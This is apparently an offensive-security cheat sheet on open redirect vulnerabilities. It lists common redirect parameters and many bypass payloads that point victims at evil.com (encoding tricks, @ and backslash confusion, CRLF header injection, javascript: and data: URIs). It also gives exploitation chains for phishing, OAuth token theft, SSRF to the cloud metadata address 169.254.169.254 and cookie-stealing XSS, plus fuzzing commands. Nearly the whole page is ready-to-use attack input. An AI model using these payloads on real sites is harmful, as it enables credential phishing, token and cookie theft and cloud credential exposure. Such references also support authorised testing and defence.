Open Redirect - BookJMP

Overview

Application redirects user to attacker-controlled URL via unvalidated parameter. Used for phishing, OAuth token theft, and SSRF chain.

Common Parameters

?url=
?redirect=
?next=
?return=
?returnUrl=
?rurl=
?dest=
?destination=
?redir=
?redirect_uri=
?redirect_url=
?forward=
?forward_url=
?target=
?to=
?out=
?view=
?login?to=
?image_url=
?go=
?continue=
?checkout_url=

Detection

https://TARGET/login?redirect=https://evil.com
https://TARGET/redirect?url=https://evil.com
https://TARGET/out?to=https://evil.com

Check if browser redirects to evil.com.

Bypass Techniques

Double URL Encoding

https://TARGET/redirect?url=https%3A%2F%2Fevil.com
https://TARGET/redirect?url=https%253A%252F%252Fevil.com

Using @ Symbol

https://TARGET/redirect?url=https://[email protected]
https://TARGET/redirect?url=https://evil.com#@TARGET

Browser resolves user@host — actual destination is evil.com.

Backslash

https://TARGET/redirect?url=https://evil.com\@TARGET
https://TARGET/redirect?url=//evil.com\@TARGET

Protocol-Relative

https://TARGET/redirect?url=//evil.com
https://TARGET/redirect?url=\/\/evil.com

Subdomain Trick

https://TARGET/redirect?url=https://TARGET.evil.com
https://TARGET/redirect?url=https://evil.com/TARGET

Null Byte / Whitespace

https://TARGET/redirect?url=https://evil.com%00.TARGET
https://TARGET/redirect?url=https://evil.com%0d%0a.TARGET
https://TARGET/redirect?url=https://evil.com%09

CRLF Injection in Redirect

https://TARGET/redirect?url=%0d%0aLocation:%20https://evil.com

JavaScript Protocol

https://TARGET/redirect?url=javascript:alert(document.domain)
https://TARGET/redirect?url=java%0d%0ascript:alert(1)

Data URI

https://TARGET/redirect?url=data:text/html,<script>window.location='https://evil.com'</script>

Dot Bypass

https://TARGET/redirect?url=https://evil。com          # Fullwidth dot
https://TARGET/redirect?url=https://evil%E3%80%82com

Path Traversal

https://TARGET/redirect?url=/\evil.com
https://TARGET/redirect?url=/.evil.com
https://TARGET/redirect?url=/evil.com/..;/

Exploitation

Phishing

https://legit-site.com/login?redirect=https://evil-site.com/fake-login

Victim sees legitimate domain in link → enters credentials on fake page.

OAuth Token Theft

https://auth.TARGET/authorize?client_id=APP&redirect_uri=https://TARGET/callback?next=https://evil.com

OAuth flow redirects token to attacker via chained open redirect.

SSRF Chain

If server-side follows redirect:

https://TARGET/fetch?url=https://TARGET/redirect?url=http://169.254.169.254/latest/meta-data/

XSS via javascript: Protocol

https://TARGET/redirect?url=javascript:alert(document.cookie)

Automation

Fuzzing Parameters

# Find redirect parameters
cat urls.txt | grep -iE "redirect|url|next|return|dest|forward|to|go|continue" | sort -u

With gf Patterns

cat urls.txt | gf redirect

Nuclei

nuclei -t http/vulnerabilities/open-redirect/ -l urls.txt

Quick Reference

Bypass	Payload
Basic	`?url=https://evil.com`
@ trick	`?url=https://[email protected]`
Protocol-relative	`?url=//evil.com`
Subdomain	`?url=https://TARGET.evil.com`
Backslash	`?url=//evil.com\@TARGET`
Double encode	`?url=https%253A%252F%252Fevil.com`
javascript:	`?url=javascript:alert(1)`

Documentation Index

​Overview

​Common Parameters

​Detection

​Bypass Techniques

​Double URL Encoding

​Using @ Symbol

​Backslash

​Protocol-Relative

​Subdomain Trick

​Null Byte / Whitespace

​CRLF Injection in Redirect

​JavaScript Protocol

​Data URI

​Dot Bypass

​Path Traversal

​Exploitation

​Phishing

​OAuth Token Theft

​SSRF Chain

​XSS via javascript: Protocol

​Automation

​Fuzzing Parameters

​With gf Patterns

​Nuclei

​Quick Reference

​Sources